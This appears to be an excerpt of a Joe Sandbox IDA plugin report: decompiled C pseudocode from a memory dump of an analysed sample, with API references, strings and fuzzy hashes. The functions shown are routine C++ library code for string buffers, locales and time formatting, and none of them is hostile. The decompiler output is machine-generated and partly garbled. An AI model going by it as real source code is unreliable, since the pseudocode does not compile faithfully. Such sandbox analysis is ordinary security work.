                          							_t287 =  ~(0 | _t380 > 0x00000000) | _t256 + 0x00000001;
                          							if(_t287 > 0x7fffffff) {
                          								L22:
                          								E012F4A60();
                          								asm("int3");
                          								asm("int3");
                          								asm("int3");
                          								asm("int3");
                          								asm("int3");
                          								asm("int3");
                          								asm("int3");
                          								asm("int3");
                          								asm("int3");
                          								asm("int3");
                          								_push(_t353);
                          								_t354 = _t360;
                          								_t362 = _t360 - 0x14;
                          								_push(_t268);
                          								_t269 = _t287;
                          								_t289 = _v136;
                          								_t74 = _t269 + 0x10; // 0x10
                          								_t195 = _t74;
                          								_push(_t336);
                          								_t337 =  *_t195;
                          								_v152 = _t195;
                          								__eflags = _t289 - _t337;
                          								if(_t289 > _t337) {
                          									_t313 =  *(_t269 + 0x14);
                          									_push(_t320);
                          									_v28 = _t313;
                          									_t322 = _t289 - _t337;
                          									_v24 = _t322;
                          									__eflags = _t322 - _t313 - _t337;
                          									if(_t322 > _t313 - _t337) {
                          										__eflags = 0x7fffffff - _t337 - _t322;
                          										if(__eflags < 0) {
                          											E012F4B30(_t289, __eflags);
                          											asm("int3");
                          											asm("int3");
                          											asm("int3");
                          											asm("int3");
                          											asm("int3");
                          											asm("int3");
                          											asm("int3");
                          											asm("int3");
                          											asm("int3");
                          											asm("int3");
                          											asm("int3");
                          											asm("int3");
                          											asm("int3");
                          											asm("int3");
                          											asm("int3");
                          											asm("int3");
                          											_push(_t354);
                          											_t355 = _t362;
                          											_push(_t269);
                          											_t270 = _t289;
                          											_t290 = _v168;
                          											_push(_t337);
                          											_push(_t322);
                          											_t323 = _v172;
                          											_t314 =  *(_t270 + 0x14);
                          											_t338 =  *((intOrPtr*)(_t270 + 0x10));
                          											_v196 = _t323;
                          											_v185 = _t290;
                          											_v200 = _t314;
                          											__eflags = _t323 - _t314 - _t338;
                          											if(_t323 > _t314 - _t338) {
                          												__eflags = 0x7fffffff - _t338 - _t323;
                          												if(__eflags < 0) {
                          													E012F4B30(_t290, __eflags);
                          													asm("int3");
                          													asm("int3");
                          													asm("int3");
                          													asm("int3");
                          													asm("int3");
                          													asm("int3");
                          													asm("int3");
                          													asm("int3");
                          													_push(_t355);
                          													_push(_t290);
                          													_push(_t338);
                          													_push(2);
                          													_t339 = _t290;
                          													_v220 = _t339;
                          													_t206 = E012F8A40(_t270, _v208, 0, L"PT");
                          													 *(_t339 + 0x10) = 0;
                          													__eflags = 0;
                          													 *(_t339 + 0x14) = 0;
                          													asm("movups xmm0, [eax]");
                          													asm("movups [esi], xmm0");
                          													asm("movq xmm0, [eax+0x10]");
                          													asm("movq [esi+0x10], xmm0");
                          													 *(_t206 + 0x10) = 0;
                          													 *(_t206 + 0x14) = 7;
                          													 *_t206 = 0;
                          													return _t339;
                          												} else {
                          													_t294 = _t338 + _t323 | 0x0000000f;
                          													__eflags = _t294 - 0x7fffffff;
                          													if(_t294 <= 0x7fffffff) {
                          														_v16 = _t314 >> 1;
                          														__eflags = _t314 - 0x7fffffff - _v16;
                          														if(_t314 <= 0x7fffffff - _v16) {
                          															_t213 = _v16 + _t314;
                          															__eflags = _t294 - _t213;
                          															_t295 =  <  ? _t213 : _t294;
                          														} else {
                          															_t295 = 0x7fffffff;
                          														}
                          													} else {
                          														_t295 = 0x7fffffff;
                          													}
                          													_t126 = _t295 + 1; // 0x80000000
                          													_v16 = _t295;
                          													_t215 = E012F57D0(_t270, _t314, _t323, _t126);
                          													_v24 = _t215;
                          													 *((intOrPtr*)(_t270 + 0x10)) = _t338 + _t323;
                          													__eflags = _v32 - 0x10;
                          													 *(_t270 + 0x14) = _v16;
                          													_v16 = _v17;
                          													_push(_t338);
                          													if(_v32 < 0x10) {
                          														_push(_t270);
                          														_push(_t215);
                          														E01345ED0();
                          														_t341 = _t338 + _v24;
                          														__eflags = _t341;
                          														E013478D0(_t323, _t341, _v16, _t323);
                          														 *((char*)(_t341 + _t323)) = 0;
                          														E012F5760(_t270,  &_v24);
                          														return _t270;
                          													} else {
                          														_t325 =  *_t270;
                          														_push( *_t270);
                          														_push(_t215);
                          														E01345ED0();
                          														_t343 = _t338 + _v24;
                          														E013478D0( *_t270, _t343, _v16, _v28);
                          														 *((char*)(_t343 + _v28)) = 0;
                          														_t225 = _v32 + 1;
                          														__eflags = _t225;
                          														_push(_t225);
                          														E012F56A0(_t270,  *_t270, _t325);
                          														 *_t270 = _v24;
                          														return _t270;
                          													}
                          												}
                          											} else {
                          												_v16 = _t270;
                          												 *((intOrPtr*)(_t270 + 0x10)) = _t323 + _t338;
                          												_t230 = _t270;
                          												__eflags = _t314 - 0x10;
                          												if(_t314 >= 0x10) {
                          													_t230 =  *_t270;
                          													_v16 =  *_t270;
                          												}
                          												E013478D0(_t323, _t230 + _t338, _t290, _t323);
                          												_t301 = _v16 + _t323;
                          												__eflags = _t301;
                          												 *((char*)(_t301 + _t338)) = 0;
                          												return _t270;
                          											}
                          										} else {
                          											_t302 = _t289 | 0x0000000f;
                          											__eflags = _t302 - 0x7fffffff;
                          											if(_t302 <= 0x7fffffff) {
                          												_v12 = _t313 >> 1;
                          												__eflags = _t313 - 0x7fffffff - _v12;
                          												if(_t313 <= 0x7fffffff - _v12) {
                          													_t238 = _v12 + _t313;
                          													__eflags = _t302 - _t238;
                          													_t303 =  <  ? _t238 : _t302;
                          												} else {
                          													_t303 = 0x7fffffff;
                          												}
                          											} else {
                          												_t303 = 0x7fffffff;
                          											}
                          											_t87 = _t303 + 1; // 0x80000000
                          											_v12 = _t303;
                          											_t240 = E012F57D0(_t269, _t313, _t322, _t87);
                          											__eflags = _v28 - 0x10;
                          											_v20 = _t240;
                          											 *_v16 = _v0;
                          											 *(_t269 + 0x14) = _v12;
                          											_v16 = _a4;
                          											_push(_t337);
                          											if(_v28 < 0x10) {
                          												_push(_t269);
                          												_push(_t240);
                          												E01345ED0();
                          												_t346 = _t337 + _v20;
                          												__eflags = _t346;
                          												E013478D0(_t322, _t346, _v16, _t322);
                          												 *((char*)(_t346 + _t322)) = 0;
                          												return E012F5760(_t269,  &_v20);
                          											} else {
                          												_t329 =  *_t269;
                          												_push( *_t269);
                          												_push(_t240);
                          												E01345ED0();
                          												_t348 = _t337 + _v20;
                          												E013478D0( *_t269, _t348, _v16, _v24);
                          												 *((char*)(_t348 + _v24)) = 0;
                          												_t249 = _v28 + 1;
                          												__eflags = _t249;
                          												_push(_t249);
                          												E012F56A0(_t269,  *_t269, _t329);
                          												_t251 = _v20;
                          												 *_t269 = _t251;
                          												return _t251;
                          											}
                          										}
                          									} else {
                          										 *_v16 = _t289;
                          										__eflags = _t313 - 0x10;
                          										if(_t313 >= 0x10) {
                          											_t269 =  *_t269;
                          										}
                          										_t350 = _t337 + _t269;
                          										__eflags = _t350;
                          										_t254 = E013478D0(_t322, _t350, _a4, _t322);
                          										 *((char*)(_t350 + _t322)) = 0;
                          										return _t254;
                          									}
                          								} else {
                          									__eflags =  *(_t269 + 0x14) - 0x10;
                          									if( *(_t269 + 0x14) >= 0x10) {
                          										_t269 =  *_t269;
                          									}
                          									 *_t195 = _t289;
                          									 *((char*)(_t269 + _t289)) = 0;
                          									return _t195;
                          								}
                          							} else {
                          								_t311 = E012F57D0(_t268, _t312, _t320, _t287 + _t287);
                          								_v104 = _v124;
                          								_v100 = _v92;
                          								 *_t311 = _v120;
                          								_v96 = _t311;
                          								E012F5760( &_v120,  &_v96);
                          								_t360 = _t360 + 0xc;
                          								_v104 = 0;
                          								goto L13;
                          							}
                          						}
                          					}
                          				}
                          			}
                          0x013036e3
                          0x013036e4
                          0x01303723
                          0x01303724
                          0x01303725
                          0x0130372a
                          0x0130372a
                          0x01303732
                          0x0130373a
                          0x01303740
                          0x01303750
                          0x013036e6
                          0x013036e6
                          0x013036e8
                          0x013036e9
                          0x013036ea
                          0x013036f2
                          0x013036f9
                          0x01303701
                          0x01303708
                          0x01303708
                          0x01303709
                          0x0130370b
                          0x01303716
                          0x01303720
                          0x01303720
                          0x013036e4
                          0x01303638
                          0x01303638
                          0x0130363e
                          0x01303641
                          0x01303643
                          0x01303646
                          0x01303648
                          0x0130364a
                          0x0130364a
                          0x01303656
                          0x01303661
                          0x01303661
                          0x01303666
                          0x0130366f
                          0x0130366f
                          0x0130352e
                          0x0130352e
                          0x01303531
                          0x01303537
                          0x01303544
                          0x0130354f
                          0x01303551
                          0x0130355d
                          0x0130355f
                          0x01303561
                          0x01303553
                          0x01303553
                          0x01303553
                          0x01303539
                          0x01303539
                          0x01303539
                          0x01303564
                          0x01303567
                          0x0130356b
                          0x01303576
                          0x0130357d
                          0x01303580
                          0x01303585
                          0x0130358c
                          0x0130358f
                          0x01303590
                          0x013035cd
                          0x013035ce
                          0x013035cf
                          0x013035d4
                          0x013035d4
                          0x013035dc
                          0x013035e4
                          0x013035f8
                          0x01303592
                          0x01303592
                          0x01303594
                          0x01303595
                          0x01303596
                          0x0130359e
                          0x013035a5
                          0x013035ad
                          0x013035b4
                          0x013035b4
                          0x013035b5
                          0x013035b7
                          0x013035bc
                          0x013035c2
                          0x013035ca
                          0x013035ca
                          0x01303590
                          0x013034f5
                          0x013034f8
                          0x013034fa
                          0x013034fd
                          0x013034ff
                          0x013034ff
                          0x01303505
                          0x01303505
                          0x0130350a
                          0x01303512
                          0x0130351c
                          0x0130351c
                          0x013034c9
                          0x013034c9
                          0x013034cd
                          0x013034cf
                          0x013034cf
                          0x013034d1
                          0x013034d4
                          0x013034dc
                          0x013034dc
                          0x013033ac
                          0x013033b5
                          0x013033ba
                          0x013033c0
                          0x013033c7
                          0x013033d1
                          0x013033d5
                          0x013033da
                          0x013033dd
                          0x00000000
                          0x013033dd
                          0x013033a6
                          0x01303370
                          0x01303369

                          APIs
                            • Part of subcall function 0134A72C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01303254,?,39CCA9F6), ref: 0134A73F
                            • Part of subcall function 0134A72C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0134A770
                          • _strftime.LIBCMT ref: 01303304
                          • Concurrency::cancel_current_task.LIBCPMT ref: 013034A1
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Time$Concurrency::cancel_current_taskFileSystemUnothrow_t@std@@@__ehfuncinfo$??2@_strftime
                          • String ID: %Y-%m-%dT%H:%M:%S
                          • API String ID: 672592798-3293947673
                          • Opcode ID: 5e7722d013ed2abea4ce4cb2ea9e4fc983f37f5ac1cb825cd7f6ec609052dff9
                          • Instruction ID: e511b04233e140d0c2c7f4cdb944b110e0aebd257ff889a1654cab7c04f74226
                          • Opcode Fuzzy Hash: 5e7722d013ed2abea4ce4cb2ea9e4fc983f37f5ac1cb825cd7f6ec609052dff9
                          • Instruction Fuzzy Hash: 15714A71D10249DFDB15DFA8C954BEEBBF8BF18318F20062AD515AB280D774A944CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 84%
                          			E0132C74F(intOrPtr __ecx, void* __edx, void* __eflags, void* __fp0) {
                          				void* _t32;
                          				void* _t34;
                          				signed int _t38;
                          				signed int _t39;
                          				intOrPtr _t47;
                          				intOrPtr _t49;
                          				void* _t50;
                          				intOrPtr* _t51;
                          				intOrPtr _t52;
                          				signed int _t53;
                          				void* _t63;
                          				intOrPtr _t65;
                          				void* _t66;
                          
                          				_t59 = __edx;
                          				_t52 = __ecx;
                          				_push(0x30);
                          				E0132F1B6(0x1369031, __eflags);
                          				_t49 = _t52;
                          				 *((intOrPtr*)(_t66 - 0x10)) = _t49;
                          				_t32 = E01317EF8(__edx, __eflags, _t66 - 0x3c);
                          				_t50 = _t49 + 0x2c;
                          				_t53 = 0xb;
                          				memcpy(_t50, _t32, _t53 << 2);
                          				_t34 = E013506CB(_t59);
                          				_t65 =  *((intOrPtr*)(_t66 - 0x10));
                          				_t63 = _t34;
                          				 *((intOrPtr*)(_t66 - 0x10)) = _t65;
                          				 *((intOrPtr*)(_t65 + 8)) = 0;
                          				 *((intOrPtr*)(_t65 + 0x10)) = 0;
                          				 *((intOrPtr*)(_t65 + 0x14)) = 0;
                          				 *((intOrPtr*)(_t65 + 0x18)) = 0;
                          				_push(_t50);
                          				 *((intOrPtr*)(_t66 - 4)) = 0;
                          				 *((intOrPtr*)(_t65 + 8)) = E01318329(__fp0,  *((intOrPtr*)(_t63 + 0x1c)), 0);
                          				E0132AEF3(_t65, 0, _t63);
                          				if( *((char*)(_t65 + 0x28)) == 0) {
                          					_t38 =  *((intOrPtr*)(_t63 + 0x29));
                          				} else {
                          					_t38 =  *((intOrPtr*)(_t63 + 0x28));
                          				}
                          				_t39 = _t38;
                          				 *(_t65 + 0x1c) = _t39;
                          				if(_t39 < 0 || _t39 >= 0x7f) {
                          					 *(_t65 + 0x1c) =  *(_t65 + 0x1c) & 0x00000000;
                          				}
                          				_t51 = _t65 + 0x20;
                          				E013256D8(_t65, _t51,  *((char*)(_t63 + 0x2b)),  *((char*)(_t63 + 0x2a)),  *((char*)(_t63 + 0x2e)));
                          				_t47 = E013256D8(_t65, _t65 + 0x24,  *((char*)(_t63 + 0x2d)),  *((char*)(_t63 + 0x2c)),  *((char*)(_t63 + 0x2f)));
                          				_t75 =  *((char*)(_t66 + 0xc));
                          				if( *((char*)(_t66 + 0xc)) != 0) {
                          					_t47 = 0x76782b24;
                          					 *_t51 = 0x76782b24;
                          					 *((intOrPtr*)(_t65 + 0x24)) = 0x76782b24;
                          				}
                          				return E0132F190(_t47, _t75);
                          			}

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Mpunct
                          • String ID: $+xv
                          • API String ID: 4240859931-1686923651
                          • Opcode ID: 377205aba8d0da8ad26aca360b18c1a2e3b5c813dbd33faf6b38e1c9cc3be93a
                          • Instruction ID: 01b954c3a74a6e9bfe071c36cddc31020d3d4512da831c1e19278dfc470dbc84
                          • Opcode Fuzzy Hash: 377205aba8d0da8ad26aca360b18c1a2e3b5c813dbd33faf6b38e1c9cc3be93a
                          • Instruction Fuzzy Hash: D021A1B1800A636FD725EF78888067FBEF8AB1D614F14495AE499C7A40D730E601CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 63%
                          			E012F96C0(intOrPtr _a4) {
                          				char _v8;
                          				char _v16;
                          				intOrPtr _v20;
                          				char _v48;
                          				void* __ecx;
                          				void* __ebp;
                          				signed int _t34;
                          				signed int _t42;
                          				void* _t52;
                          				intOrPtr _t61;
                          				intOrPtr _t68;
                          				intOrPtr _t69;
                          				signed int _t74;
                          				void* _t75;
                          
                          				_push(0xffffffff);
                          				_push(0x136595f);
                          				_push( *[fs:0x0]);
                          				_push(_t61);
                          				_t34 =  *0x13a4018; // 0x39cca9f6
                          				_push(_t34 ^ _t72);
                          				 *[fs:0x0] =  &_v16;
                          				_t68 = _t61;
                          				_v20 = _t68;
                          				E013177B6(_t61, 0);
                          				_v8 = 0;
                          				 *((intOrPtr*)(_t68 + 4)) = 0;
                          				 *((char*)(_t68 + 8)) = 0;
                          				 *((intOrPtr*)(_t68 + 0xc)) = 0;
                          				 *((char*)(_t68 + 0x10)) = 0;
                          				 *((intOrPtr*)(_t68 + 0x14)) = 0;
                          				 *((short*)(_t68 + 0x18)) = 0;
                          				 *((intOrPtr*)(_t68 + 0x1c)) = 0;
                          				 *((short*)(_t68 + 0x20)) = 0;
                          				 *((intOrPtr*)(_t68 + 0x24)) = 0;
                          				 *((char*)(_t68 + 0x28)) = 0;
                          				 *((intOrPtr*)(_t68 + 0x2c)) = 0;
                          				 *((char*)(_t68 + 0x30)) = 0;
                          				_t39 = _a4;
                          				_v8 = 6;
                          				if(_a4 == 0) {
                          					E01316C89("bad locale name");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					_push(0xffffffff);
                          					_push(0x1365830);
                          					_push( *[fs:0x0]);
                          					_push(_t68);
                          					_t42 =  *0x13a4018; // 0x39cca9f6
                          					_push(_t42 ^ _t74);
                          					 *[fs:0x0] =  &_v48;
                          					_t69 = _t61;
                          					E01317AA8(_t61, _t69);
                          					_t46 =  *((intOrPtr*)(_t69 + 0x2c));
                          					_t75 = _t74 + 4;
                          					if( *((intOrPtr*)(_t69 + 0x2c)) != 0) {
                          						E01349EA4(_t46);
                          						_t75 = _t75 + 4;
                          					}
                          					 *((intOrPtr*)(_t69 + 0x2c)) = 0;
                          					_t47 =  *((intOrPtr*)(_t69 + 0x24));
                          					if( *((intOrPtr*)(_t69 + 0x24)) != 0) {
                          						E01349EA4(_t47);
                          						_t75 = _t75 + 4;
                          					}
                          					 *((intOrPtr*)(_t69 + 0x24)) = 0;
                          					_t48 =  *((intOrPtr*)(_t69 + 0x1c));
                          					if( *((intOrPtr*)(_t69 + 0x1c)) != 0) {
                          						E01349EA4(_t48);
                          						_t75 = _t75 + 4;
                          					}
                          					 *((intOrPtr*)(_t69 + 0x1c)) = 0;
                          					_t49 =  *((intOrPtr*)(_t69 + 0x14));
                          					if( *((intOrPtr*)(_t69 + 0x14)) != 0) {
                          						E01349EA4(_t49);
                          						_t75 = _t75 + 4;
                          					}
                          					 *((intOrPtr*)(_t69 + 0x14)) = 0;
                          					_t50 =  *((intOrPtr*)(_t69 + 0xc));
                          					if( *((intOrPtr*)(_t69 + 0xc)) != 0) {
                          						E01349EA4(_t50);
                          						_t75 = _t75 + 4;
                          					}
                          					 *((intOrPtr*)(_t69 + 0xc)) = 0;
                          					_t51 =  *((intOrPtr*)(_t69 + 4));
                          					if( *((intOrPtr*)(_t69 + 4)) != 0) {
                          						E01349EA4(_t51);
                          					}
                          					 *((intOrPtr*)(_t69 + 4)) = 0;
                          					_t52 = E0131780E(_t69);
                          					 *[fs:0x0] = _v20;
                          					return _t52;
                          				} else {
                          					E01317A5D(_t61, _t68, _t39);
                          					 *[fs:0x0] = _v16;
                          					return _t68;
                          				}
                          			}

                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 012F96EB
                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 012F973A
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                          • String ID: bad locale name
                          • API String ID: 3988782225-1405518554
                          • Opcode ID: aac7d3413559320cadd453151c8f9d016ed22d80bf31e3c3918f71989a4efd19
                          • Instruction ID: 1a6891707903cbb49feffaae1053386ec59f8f858759059bb477973c1e5d3fbf
                          • Opcode Fuzzy Hash: aac7d3413559320cadd453151c8f9d016ed22d80bf31e3c3918f71989a4efd19
                          • Instruction Fuzzy Hash: 0B11A0B1904B449FD320CF69C800B57BBF8EF19714F008A5EE499C7B40D7B5A604CBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 56%
                          			E01319FF5(intOrPtr __ecx, void* __edx, void* __eflags, void* __fp0) {
                          				intOrPtr _t28;
                          				char _t37;
                          				intOrPtr _t39;
                          				intOrPtr _t40;
                          				intOrPtr* _t45;
                          				intOrPtr _t46;
                          				void* _t47;
                          				void* _t53;
                          
                          				_t53 = __fp0;
                          				_t50 = __eflags;
                          				_t44 = __edx;
                          				_t40 = __ecx;
                          				_push(0x34);
                          				E0132F1EA(0x1368813, __eflags);
                          				_t46 = _t40;
                          				_t45 = E013506CB(__edx);
                          				E01317EF8(__edx, __eflags, _t47 - 0x3c);
                          				 *((intOrPtr*)(_t47 - 0x40)) = _t46;
                          				 *((intOrPtr*)(_t46 + 8)) = 0;
                          				 *((intOrPtr*)(_t46 + 0x10)) = 0;
                          				 *((intOrPtr*)(_t46 + 0x14)) = 0;
                          				 *((intOrPtr*)(_t47 - 4)) = 0;
                          				E01317EF8(_t44, _t50, _t47 - 0x3c);
                          				_t39 =  *((intOrPtr*)(_t47 + 0xc));
                          				_t28 = 0x13836c2;
                          				if(_t39 == 0) {
                          					_t28 =  *((intOrPtr*)(_t45 + 8));
                          				}
                          				_push(_t47 - 0x3c);
                          				 *((intOrPtr*)(_t46 + 8)) = E01318329(_t53, _t28, 0);
                          				_push(_t47 - 0x3c);
                          				 *((intOrPtr*)(_t46 + 0x10)) = E01318329(_t53, "false", 0);
                          				_push(_t47 - 0x3c);
                          				 *((intOrPtr*)(_t46 + 0x14)) = E01318329(_t53, "true", 0);
                          				_t52 = _t39;
                          				if(_t39 == 0) {
                          					 *((char*)(_t46 + 0xc)) =  *((intOrPtr*)( *_t45));
                          					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4))));
                          				} else {
                          					 *((char*)(_t46 + 0xc)) = 0x2e;
                          					_t37 = 0x2c;
                          				}
                          				 *((char*)(_t46 + 0xd)) = _t37;
                          				return E0132F1A5(_t37, _t52);
                          			}

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: H_prolog3_
                          • String ID: false$true
                          • API String ID: 2427045233-2658103896
                          • Opcode ID: 175be7d4f3eec92c77711b954605e499ed353ad4eb2a789d598213b9cebd2bef
                          • Instruction ID: aa31811369f4be36d9bee926168efcb1f96eb2e58084bb27e7fd78d49b97fb0a
                          • Opcode Fuzzy Hash: 175be7d4f3eec92c77711b954605e499ed353ad4eb2a789d598213b9cebd2bef
                          • Instruction Fuzzy Hash: 04110875D41742AEC728EFB8D440B8ABBF4BF19208F14895AE4E5CB750DB70E504CB60
                          Uniqueness

                          Uniqueness Score: -1.00%